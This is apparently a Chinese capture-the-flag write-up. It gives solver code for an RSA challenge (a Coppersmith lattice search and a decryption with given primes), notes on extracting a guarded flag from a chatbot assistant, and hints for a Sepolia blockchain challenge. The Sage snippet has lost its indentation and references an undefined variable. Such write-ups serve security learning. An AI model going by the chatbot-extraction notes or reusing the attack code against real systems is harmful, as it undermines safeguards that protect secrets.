r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
R.<p,q> = Zmod(leak)[]
for tmp in range(2 ^ 14, 2 ^ 15):
f = p*r-q*t-tmp
res = small_roots(f, bounds=(2 ^ 512, 2 ^ 512), m=3, d=2)
if res:
print(res)
break
就是跑得挺久,毕竟是2的14次方
from Crypto.Util.number import inverse, long_to_bytes
# 提供的素数和密文
p=11799365899073049527038222991817294163432468116739044155324163062605081459516948129587956698210751311282285532041297993219199812623993179858635079156564471
q=7920780147742343919802692215442217736320564739726806695299813117512855265349275493667659977160207404159832804023039365285757320911861469820804465066706263
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
# RSA 参数
n = p * q
phi_n = (p - 1) * (q - 1)
e = 65537 # 公钥指数,通常是这个值
# 计算私钥 d
d = inverse(e, phi_n)
# 解密
m = pow(c, d, n)
# 将解密后的长整型转换为字节
flag = long_to_bytes(m)
print("解密后的 flag:", flag.decode())
AI
小助手
这里有一只可爱的小助手,生蚝给了他一个神秘的小flag,你如果忍心抢走flag,ta会受到惩罚的,不要抢走flag好不好/(ㄒoㄒ)/~~
这玩意就看命
一般nc连接第一次成功可能性比较大(可能刚初始化)
中间还爆出过这个,可能是对结果进行检测过滤吧
区块链
just Signin
赶时间出的,非预期做起来会很简单
Sepolia Address: 0x3948DF4C50B1671eaa6b22876Ea746899a6916C1
What is a Blockchain Explorer? Focus on input data
Sepolia Transaction Hash (Txhash) Details | Etherscan
bytecode